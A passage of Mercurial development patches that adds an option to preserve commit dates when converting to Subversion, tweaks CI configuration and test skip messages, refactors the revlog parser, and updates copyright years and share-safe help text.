open(hook, b'wb') - fp.write(pre_revprop_change) + fp.write(gen_pre_revprop_change_hook(prop_actions_allowed)) fp.close() util.setflags(hook, False, True) @@ -1667,6 +1695,23 @@ revprop=True, revision=rev, ) + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + # Subverson always uses UTC to represent date and time + date = dateutil.parsedate(commit.date) + date = (date[0], 0) + + # The only way to set date and time for svn commit is to use propset after commit is done + self.run( + b'propset', + b'svn:date', + formatsvndate(date), + revprop=True, + revision=rev, + ) + for parent in parents: self.addchild(parent, rev) return self.revid(rev) diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -570,6 +570,11 @@ default=0, ) coreconfigitem( + b'convert', + b'svn.dangerous-set-commit-dates', + default=False, +) +coreconfigitem( b'debug', b'dirstate.delaywrite', default=0, diff --git a/tests/svnxml.py b/tests/svnxml.py --- a/tests/svnxml.py +++ b/tests/svnxml.py @@ -15,6 +15,7 @@ e['revision'] = entry.getAttribute('revision') e['author'] = xmltext(entry.getElementsByTagName('author')[0]) e['msg'] = xmltext(entry.getElementsByTagName('msg')[0]) + e['date'] = xmltext(entry.getElementsByTagName('date')[0]) e['paths'] = [] paths = entry.getElementsByTagName('paths') if paths: @@ -42,7 +43,7 @@ except AttributeError: fp = sys.stdout for e in entries: - for k in ('revision', 'author', 'msg'): + for k in ('revision', 'author', 'date', 'msg'): fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8')) for path, action, fpath, frev in sorted(e['paths']): frominfo = b'' diff --git a/tests/test-convert-svn-sink.t b/tests/test-convert-svn-sink.t --- a/tests/test-convert-svn-sink.t +++ b/tests/test-convert-svn-sink.t @@ -54,10 +54,12 @@ 2 2 test a revision: 2 author: test + date: * (glob) msg: modify a file M /a revision: 1 author: test + date: * (glob) msg: add a file A /a A /d1 @@ -95,6 +97,7 @@ 3 3 test b revision: 3 author: test + date: * (glob) msg: rename a file D /a A /b (from /a@2) @@ -131,6 +134,7 @@ 4 4 test c revision: 4 author: test + date: * (glob) msg: copy a file A /c (from /b@3) $ ls a a-hg-wc @@ -167,6 +171,7 @@ 5 5 test . revision: 5 author: test + date: * (glob) msg: remove a file D /b $ ls a a-hg-wc @@ -209,6 +214,7 @@ 6 6 test c revision: 6 author: test + date: * (glob) msg: make a file executable M /c #if execbit @@ -247,6 +253,7 @@ 8 8 test newlink revision: 8 author: test + date: * (glob) msg: move symlink D /link A /newlink (from /link@7) @@ -278,6 +285,7 @@ 7 7 test f revision: 7 author: test + date: * (glob) msg: f D /c A /d @@ -315,6 +323,7 @@ 1 1 test d1/a revision: 1 author: test + date: * (glob) msg: add executable file in new directory A /d1 A /d1/a @@ -343,6 +352,7 @@ 2 2 test d2/a revision: 2 author: test + date: * (glob) msg: copy file to new directory A /d2 A /d2/a (from /d1/a@1) @@ -416,21 +426,25 @@ 4 4 test right-2 revision: 4 author: test + date: * (glob) msg: merge A /right-1 A /right-2 revision: 3 author: test + date: * (glob) msg: left-2 M /b A /left-2 revision: 2 author: test + date: * (glob) msg: left-1 M /b A /left-1 revision: 1 author: test + date: * (glob) msg: base A /b @@ -459,10 +473,12 @@ 2 2 test .hgtags revision: 2 author: test + date: * (glob) msg: Tagged as v1.0 A /.hgtags revision: 1 author: test + date: * (glob) msg: Add file a A /a $ rm -rf a a-hg a-hg-wc @@ -494,10 +510,12 @@ 2 2 test exec revision: 2 author: test + date: * (glob) msg: remove executable bit M /exec revision: 1 author: test + date: * (glob) msg: create executable A /exec $ test ! -x a-hg-wc/exec @@ -540,11 +558,77 @@ 2 2 test b revision: 2 author: test + date: * (glob) msg: Another change A /b revision: 1 author: test + date: * (glob) msg: Some change A /a $ rm -rf a a-hg a-hg-wc + +Commit dates convertion + + $ hg init a + + $ echo a >> a/a + $ hg add a + adding a/a + $ hg --cwd a ci -d '1 0' -A -m 'Change 1' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change 2' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change at the same time' + + $ echo a >> a/a + $ hg --cwd a ci -d '1 0' -m 'Change in the past' + + $ echo a >> a/a + $ hg --cwd a ci -d '3 0' -m 'Change in the future' + + $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a + assuming destination a-hg + initializing svn repository 'a-hg' + initializing svn working copy 'a-hg-wc' + scanning source... + sorting... + converting... + 4 Change 1 + 3 Change 2 + 2 Change at the same time + 1 Change in the past + 0 Change in the future + $ svnupanddisplay a-hg-wc 0 + 5 5 test . + 5 5 test a + revision: 5 + author: test + date: 1970-01-01T00:00:03.000000Z + msg: Change in the future + M /a + revision: 4 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change in the past + M /a + revision: 3 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change at the same time + M /a + revision: 2 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change 2 + M /a + revision: 1 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change 1 + A /a + + $ rm -rf a a-hg a-hg-wc diff --git a/tests/test-convert.t b/tests/test-convert.t --- a/tests/test-convert.t +++ b/tests/test-convert.t @@ -388,6 +388,23 @@ does not convert tags from the source repo to the target repo. The default is False. + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + convert.svn.dangerous-set-commit-dates + preserve original commit dates, forcefully setting + "svn:date" revision properties. This option is DANGEROUS and + may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in + "svn log"), as original commit dates are not guaranteed to + be monotonically increasing. + + For commit dates setting to work destination repository must have "pre- + revprop-change" hook configured to allow setting of "svn:date" revision + properties. See Subversion documentation for more details. + options ([+] can be repeated): -s --source-type TYPE source repository type # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611759212 -3600 # Wed Jan 27 15:53:32 2021 +0100 # Node ID 2aef69e8efbb477959f182e9df19b0e9637f5e6d # Parent 7525e77b5eac36f88b655a6067fe1969af733003 heptapod-ci: add a default value for HG_CI_IMAGE_TAG Differential Revision: https://phab.mercurial-scm.org/D9886 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -7,6 +7,7 @@ variables: PYTHON: python TEST_HGMODULEPOLICY: "allow" + HG_CI_IMAGE_TAG: "latest" .runtests_template: &runtests stage: tests # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611755840 -3600 # Wed Jan 27 14:57:20 2021 +0100 # Node ID 6b0dac9f650afb548bb2d2a17d3fb0c49f231e6a # Parent 2aef69e8efbb477959f182e9df19b0e9637f5e6d heptapod-ci: indicate which version of black is used for the run This will help understand possible mismatch Differential Revision: https://phab.mercurial-scm.org/D9887 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -20,6 +20,7 @@ - cargo build - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - black --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611755904 -3600 # Wed Jan 27 14:58:24 2021 +0100 # Node ID 959d581bb62560434452bb694e6b063d0fc29e9f # Parent 6b0dac9f650afb548bb2d2a17d3fb0c49f231e6a black: show required version in skip message This will help people to configure their black Differential Revision: https://phab.mercurial-scm.org/D9888 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -1054,7 +1054,7 @@ return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)') -@check('black', 'the black formatter for python') +@check('black', 'the black formatter for python (>= 20.8b1)') def has_black(): blackcmd = 'black --version' version_regex = b'black, version ([0-9a-b.]+)' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611756288 -3600 # Wed Jan 27 15:04:48 2021 +0100 # Node ID a390c7fcd28605d6f7be5bcad910badd602bd9ca # Parent 959d581bb62560434452bb694e6b063d0fc29e9f heptapod-ci: indicate which version of clang-format is used for the run This will help understand possible mismatch Differential Revision: https://phab.mercurial-scm.org/D9889 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -21,6 +21,7 @@ - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - black --version + - clang-format --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611756362 -3600 # Wed Jan 27 15:06:02 2021 +0100 # Node ID 9fd4f7af42ea806d3aa77beb1dbbf806dee75306 # Parent a390c7fcd28605d6f7be5bcad910badd602bd9ca clang-format: show required version in skip message This will help people to configure their black Differential Revision: https://phab.mercurial-scm.org/D9890 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -591,7 +591,7 @@ return matchoutput("pylint --help", br"Usage:[ ]+pylint", True) -@check("clang-format", "clang-format C code formatter") +@check("clang-format", "clang-format C code formatter (>= 11)") def has_clang_format(): m = matchoutput('clang-format --version', br'clang-format version (\d+)') # style changed somewhere between 10.x and 11.x # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611843168 -3600 # Thu Jan 28 15:12:48 2021 +0100 # Node ID 95054317e1722c5d22c4c8d03eccbf83acb4f78d # Parent 9fd4f7af42ea806d3aa77beb1dbbf806dee75306 revlog: use a less probable revlog version for backwards compatibility This allows us to define a usable v2. Differential Revision: https://phab.mercurial-scm.org/D9902 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3639,11 +3639,11 @@ # effectively locks out old clients and prevents them from # mucking with a repo in an unknown format. # - # The revlog header has version 2, which won't be recognized by + # The revlog header has version 65535, which won't be recognized by # such old clients. hgvfs.append( b'00changelog.i', - b'\0\0\0\2 dummy changelog to prevent using the old repo ' + b'\0\0\xFF\xFF dummy changelog to prevent using the old repo ' b'layout', ) diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -5,7 +5,7 @@ $ hg commit -m test $ rm .hg/requires $ hg tip - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (65535) in revlog 00changelog.i [50] $ echo indoor-pool > .hg/requires $ hg tip # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611843993 -3600 # Thu Jan 28 15:26:33 2021 +0100 # Node ID 095fa99ae5f5f0c6b30a442b38e5188fd18a8cef # Parent 95054317e1722c5d22c4c8d03eccbf83acb4f78d revlog: prepare pure parser for being overloaded The current class uses module-level variables which don't allow for reusing the current logic for a slightly different revlog version. Differential Revision: https://phab.mercurial-scm.org/D9903 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -33,13 +33,6 @@ return x -indexformatng = b">Qiiiiii20s12x" -indexfirst = struct.calcsize(b'Q') -sizeint = struct.calcsize(b'i') -indexsize = struct.calcsize(indexformatng) -nullitem = (0, 0, 0, -1, -1, -1, -1, nullid) - - def gettype(q): return int(q & 0xFFFF) @@ -49,6 +42,12 @@ class BaseIndexObject(object): + index_format = b">Qiiiiii20s12x" + big_int_size = struct.calcsize(b'Q') + int_size = struct.calcsize(b'i') + index_size = struct.calcsize(index_format) + null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -94,7 +93,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(indexformatng, *tup) + data = _pack(self.index_format, *tup) self._extra.append(data) def _check_index(self, i): @@ -105,14 +104,14 @@ def __getitem__(self, i): if i == -1: - return nullitem + return self.null_item self._check_index(i) if i >= self._lgt: data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + indexsize] - r = _unpack(indexformatng, data) + data = self._data[index : index + self.index_size] + r = _unpack(self.index_format, data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -120,13 +119,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % indexsize == 0 + assert len(data) % self.index_size == 0 self._data = data - self._lgt = len(data) // indexsize + self._lgt = len(data) // self.index_size self._extra = [] def _calculate_index(self, i): - return i * indexsize + return i * self.index_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -135,7 +134,7 @@ self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * indexsize] + self._data = self._data[: i * self.index_size] self._lgt = i self._extra = [] else: @@ -198,14 +197,16 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - indexsize: + while off <= len(self._data) - self.index_size: + start = off + self.big_int_size (s,) = struct.unpack( - b'>i', self._data[off + indexfirst : off + sizeint + indexfirst] + b'>i', + self._data[start : start + self.int_size], ) if lgt is not None: self._offsets[count] = off count += 1 - off += indexsize + s + off += self.index_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610751798 -3600 # Sat Jan 16 00:03:18 2021 +0100 # Node ID e948ad0dcbe2dbea1cd7d2acfdd37348f6f15f60 # Parent 095fa99ae5f5f0c6b30a442b38e5188fd18a8cef copies: add an devel option to trace all files Filelog based copy tracing only trace copy for file that have been added. This is a trade off between skipping some rare copy case in exchange for avoiding atrocious-to-the-point-of-unusable performance. The changeset centric copy tracing does not need this trade off and naturally trace all copy, include the one involving non-new files. In order to ease the comparison from both algorithm, we add a small devel option to trace copy for all files in the target revisions. Differential Revision: https://phab.mercurial-scm.org/D9796 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -615,6 +615,12 @@ b'check-relroot', default=False, ) +# Track copy information for all file, not just "added" one (very slow) +coreconfigitem( + b'devel', + b'copy-tracing.trace-all-files', + default=False, +) coreconfigitem( b'devel', b'default-date', diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -152,13 +152,21 @@ if b.p1() == a and b.p2().node() == nullid: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) - missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): + missing = list(b.walk(match)) + # _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg(b'debug.copies: searching all files: %d\n' % len(missing)) + else: + missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg( + b'debug.copies: missing files to search: %d\n' + % len(missing) + ) ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True) - if debug: - dbg(b'debug.copies: missing files to search: %d\n' % len(missing)) - for f in sorted(missing): if debug: dbg(b'debug.copies: tracing file: %s\n' % f) diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -95,6 +95,8 @@ x -> y $ hg debugpathcopies 0 1 x -> y (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> y Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -113,6 +115,8 @@ x -> x2 $ hg debugpathcopies 0 1 x -> x2 (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> x2 Rename file in a loop: x->y->z->x $ newrepo diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -228,6 +228,17 @@ should show no copies $ hg st -C +note: since filelog based copy tracing only trace copy for new file, the copy information here is not displayed. + + $ hg status --copies --change . + M bar + +They are a devel option to walk all file and fine this information anyway. + + $ hg status --copies --change . --config devel.copy-tracing.trace-all-files=yes + M bar + foo + copy --after on an added file $ cp bar baz $ hg add baz # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611814257 28800 # Wed Jan 27 22:10:57 2021 -0800 # Node ID 29e3e46b0a22e02a90583116f52d713090dc983b # Parent e948ad0dcbe2dbea1cd7d2acfdd37348f6f15f60 narrow: delete a stale TODO about not sending groups the client already has 2c5835b4246b changed the changegroup generation to not send treemanifests for directories the client had before widening. As that commit mentions, we had already stopped before that commit to send the changelog and filelogs for files the client already had. Differential Revision: https://phab.mercurial-scm.org/D9898 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2536,8 +2536,6 @@ for r in repo.revs(b"::%ln", common): commonnodes.add(cl.node(r)) if commonnodes: - # XXX: we should only send the filelogs (and treemanifest). user - # already has the changelog and manifest packer = changegroup.getbundler( cgversion, repo, # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611821655 28800 # Thu Jan 28 00:14:15 2021 -0800 # Node ID 892eb7c5edaaeb768e3ae7099e8271e68b937280 # Parent 29e3e46b0a22e02a90583116f52d713090dc983b copies: fix an incorrect comment in graftcopies() from recent D9802 I don't think the bit about creating a merge in the filelog was correct. Or at least I couldn't find a case where it happened. Differential Revision: https://phab.mercurial-scm.org/D9899 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1229,8 +1229,11 @@ new_copies = pathcopies(base, ctx) parent = wctx.p1() _filter(parent, wctx, new_copies) - # extra filtering to drop copy information for files that existed before - # the graft (otherwise we would create merge filelog for non-merge commit + # Extra filtering to drop copy information for files that existed before + # the graft. This is to handle the case of grafting a rename onto a commit + # that already has the rename. Otherwise the presence of copy information + # would result in the creation of an empty commit where we would prefer to + # not create one. for dest, __ in list(new_copies.items()): if dest in parent: del new_copies[dest] # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1611921729 -19800 # Fri Jan 29 17:32:09 2021 +0530 # Node ID 16c18d5e5dc88810d3410d9370cb851f508ffbf5 # Parent 892eb7c5edaaeb768e3ae7099e8271e68b937280 # Parent ed43b6fa847e57e61987dd3cea92b50fdbce6064 merge with stable diff --git a/contrib/automation/hgautomation/linux.py b/contrib/automation/hgautomation/linux.py --- a/contrib/automation/hgautomation/linux.py +++ b/contrib/automation/hgautomation/linux.py @@ -75,7 +75,7 @@ sudo -H -u hg -g hg /home/hg/.cargo/bin/rustup install 1.31.1 1.46.0 sudo -H -u hg -g hg /home/hg/.cargo/bin/rustup component add clippy -sudo -H -u hg -g hg /home/hg/.cargo/bin/cargo install --version 0.9.0 pyoxidizer +sudo -H -u hg -g hg /home/hg/.cargo/bin/cargo install --version 0.10.3 pyoxidizer ''' diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -16,8 +16,6 @@ before_script: - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - - cd /tmp/mercurial-ci/rust/rhg - - cargo build - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - black --version @@ -27,6 +25,17 @@ - echo "$RUNTEST_ARGS" - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS + +.rust_template: &rust + before_script: + - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no + - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` + - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - cd /tmp/mercurial-ci/rust/rhg + - cargo build + - cd /tmp/mercurial-ci/ + + checks-py2: <<: *runtests variables: @@ -83,6 +92,7 @@ test-py2-rust: <<: *runtests + <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -90,6 +100,7 @@ test-py3-rust: <<: *runtests + <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" diff --git a/contrib/install-windows-dependencies.ps1 b/contrib/install-windows-dependencies.ps1 --- a/contrib/install-windows-dependencies.ps1 +++ b/contrib/install-windows-dependencies.ps1 @@ -125,7 +125,7 @@ Invoke-Process "${prefix}\cargo\bin\rustup.exe" "component add clippy" # Install PyOxidizer for packaging. - Invoke-Process "${prefix}\cargo\bin\cargo.exe" "install --version 0.9.0 pyoxidizer" + Invoke-Process "${prefix}\cargo\bin\cargo.exe" "install --version 0.10.3 pyoxidizer" } function Install-Dependencies($prefix) { diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2020, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/hgpackaging/inno.py b/contrib/packaging/hgpackaging/inno.py --- a/contrib/packaging/hgpackaging/inno.py +++ b/contrib/packaging/hgpackaging/inno.py @@ -33,6 +33,11 @@ 'win32ctypes', } +EXTRA_INCLUDES = { + '_curses', + '_curses_panel', +} + EXTRA_INSTALL_RULES = [ ('contrib/win32/mercurial.ini', 'defaultrc/mercurial.rc'), ] @@ -78,6 +83,7 @@ 'inno', requirements_txt, extra_packages=EXTRA_PACKAGES, + extra_includes=EXTRA_INCLUDES, ) # Purge the staging directory for every build so packaging is diff --git a/contrib/packaging/hgpackaging/py2exe.py b/contrib/packaging/hgpackaging/py2exe.py --- a/contrib/packaging/hgpackaging/py2exe.py +++ b/contrib/packaging/hgpackaging/py2exe.py @@ -67,6 +67,7 @@ extra_excludes=None, extra_dll_excludes=None, extra_packages_script=None, + extra_includes=None, ): """Build Mercurial with py2exe. @@ -176,6 +177,8 @@ ) if hgext3rd_extras: env['HG_PY2EXE_EXTRA_INSTALL_PACKAGES'] = ' '.join(hgext3rd_extras) + if extra_includes: + env['HG_PY2EXE_EXTRA_INCLUDES'] = ' '.join(sorted(extra_includes)) if extra_excludes: env['HG_PY2EXE_EXTRA_EXCLUDES'] = ' '.join(sorted(extra_excludes)) if extra_dll_excludes: diff --git a/contrib/packaging/hgpackaging/wix.py b/contrib/packaging/hgpackaging/wix.py --- a/contrib/packaging/hgpackaging/wix.py +++ b/contrib/packaging/hgpackaging/wix.py @@ -39,6 +39,10 @@ 'win32ctypes', } +EXTRA_INCLUDES = { + '_curses', + '_curses_panel', +} EXTRA_INSTALL_RULES = [ ('contrib/packaging/wix/COPYING.rtf', 'COPYING.rtf'), @@ -330,6 +334,7 @@ requirements_txt, extra_packages=EXTRA_PACKAGES, extra_packages_script=extra_packages_script, + extra_includes=EXTRA_INCLUDES, ) build_dir = hg_build_dir / ('wix-%s' % arch) diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2020 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Matt Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -29,7 +29,7 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2020 Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others VersionInfoCompany=Matt Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max diff --git a/contrib/packaging/wix/COPYING.rtf b/contrib/packaging/wix/COPYING.rtf index fc98ff56d9794ed561e92196cf4ec116b680532f..8bca18aa4dbe55caca8ffb71d89f9d31d2e02413 GIT binary patch literal 1792 zc$|$?!EW0)5Z!Zt{KKG^Z5LigQj<g1iv_$z(ilygz;RFn;DsVb)@&(KA%_+W!~edZ zEH^G1boU}z^zgkmZyvc7o~v9)8>oM%c9j<wh0s`4nXoRBa!o5aEf{H6c~+cnMdd7W zX||%uL}kf{O4ZT_<P4V7V1PMxuyBpElilw0WGj?2&U0yCB0TC$tURL4L}?-x7Z;Ph z<~OlIi(azxupm{VE;7ioaW>9BWas%#tO>iXWc9g-Du>e((Mqp{p^Ll_zJCT&oM$4K zCK}Gg^FO`5P-J2+{r!8mMX#bKX+ZocKR}UX7rz%-k;AQIhFht=N@GA;4UTK{A#v=P zPEU>*^PVvmK^9r|1Md+H1*kkC1Xpn<Jx*ZbA}DFWqo%-~%E$=BiS*2QXq={MlNO@Y z=z(hlM&AT*RsZp6{s^CXrwrW3(vX51QfLE$4A7>PP@{%&)0bZ*_J@HTu3WTQGC4Z| zq|_p;(FbxCiUYxbHUj72t>h%wgKN{KcOdNsjO3Sn<Gne{8lm-W<z*8fF}*aWfou<4 zyB2|K$?0nY9T@{9LJU|%GlDWQe3>n;?;e*hoj<{s>0&XRFP|pR5!Ws<;2QTx)U<|B zLnpnLmN!ZI?d9U*^>n_R{yn>yEuWJ5tJ!jX`S1W&cMF)p{dBRMeSEx`F5v!gaew!4 zIcT3*u&xJBrW*_aJU&PAdlzNf8d9<}2u5}ZSEl@GV3#`UJTckTzMW)`a_z>`s%EI2 z(dc_4(;t1Lpp~9C(A5qaxjBq`82)#e;3G>%$tXj;2zGsjD(6AVMy@c7fUGi6CmD%o ze~`=wLW_#h53-6hT9zh>QO*W@j%YbWbN~VADI|pC^bmy@Fx8WlB^lyP;!bPF(%|h2 zc^aX042Bv?gJ%cEg+97kvP@Y0yTnxOF(tguhg2$h$vs=zfdN7cEXnR?kQ#RBFp$^1 zgM^{C6)H(4dORrprivZ7HeDy!$LDweL&>|*K2TIah^ii@l~9idRm%V+q6Mkf6i|O7 zav{**iW?9HCx=))ApX~ZO*3p<IxWbO%wgw~ix6rTjfPsT5j-lSHENK3xc<*gU|b(b zu9Iis(DNiUYaNduAi|&9t*8i%PM2?GG}*x0>!<t6#m#K~8Q#>)?H^}nUDu6QHjbTN zotZs;ID50(ZPOkf3~zr{D5A-Ps<Pc~w>#X&@Ym4j&jk#y&EYZ~2Q+9&jg@QQ75-NX NU*q4C?@mvC`4_nJd0qej diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2020 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Matt Mackall and others. </p> <p> diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -7809,7 +7809,7 @@ ) license = _( b"(see https://mercurial-scm.org for more information)\n" - b"\nCopyright (C) 2005-2020 Matt Mackall and others\n" + b"\nCopyright (C) 2005-2021 Matt Mackall and others\n" b"This is free software; see the source for copying conditions. " b"There is NO\nwarranty; " b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -147,14 +147,12 @@ merge tool configuration but packagers can also put other default configuration there. -.. container:: verbose - - On versions 5.7 and later, if share-safe functionality is enabled, - shares will read config file of share source too. - `<share-source/.hg/hgrc>` is read before reading `<repo/.hg/hgrc>`. - - For configs which should not be shared, `<repo/.hg/hgrc-not-shared>` - should be used. +On versions 5.7 and later, if share-safe functionality is enabled, +shares will read config file of share source too. +`<share-source/.hg/hgrc>` is read before reading `<repo/.hg/hgrc>`. + +For configs which should not be shared, `<repo/.hg/hgrc-not-shared>` +should be used. Syntax ====== @@ -915,8 +913,27 @@ Disabled by default. ``use-share-safe`` - Enable or disable the "share-safe" functionality, which enables shares - to read requirements and configuration of its source repository. + Enforce "safe" behaviors for all "shares" that access this repository. + + With this feature, "shares" using this repository as a source will: + + * read the source repository's configuration (`<source>/.hg/hgrc`). + * read and use the source repository's "requirements" + (except the working copy specific one). + + Without this feature, "shares" using this repository as a source will: + + * keep tracking the repository "requirements" in the share only, ignoring + the source "requirements", possibly diverging from them. + * ignore source repository config. This can create problems, like silently + ignoring important hooks. + + Beware that existing shares will not be upgraded/downgraded, and by + default, Mercurial will refuse to interact with them until the mismatch + is resolved. See :hg:`help config share.safe-mismatch.source-safe` and + :hg:`help config share.safe-mismatch.source-not-safe` for details. + + Introduced in Mercurial 5.7. Disabled by default. @@ -1959,6 +1976,14 @@ tries to upgrade the share; if it fails, continue by respecting the share source setting + Check :hg:`help config format.use-share-safe` for details about the + share-safe feature. + +``safe-mismatch.source-safe.warn`` + Shows a warning on operations if the shared repository does not use + share-safe, but the source repository does. + (default: True) + ``safe-mismatch.source-not-safe`` Controls what happens when the shared repository uses the share-safe @@ -1977,11 +2002,8 @@ tries to downgrade the share to not use share-safe; if it fails, continue by respecting the shared source setting - -``safe-mismatch.source-safe.warn`` - Shows a warning on operations if the shared repository does not use - share-safe, but the source repository does. - (default: True) + Check :hg:`help config format.use-share-safe` for details about the + share-safe feature. 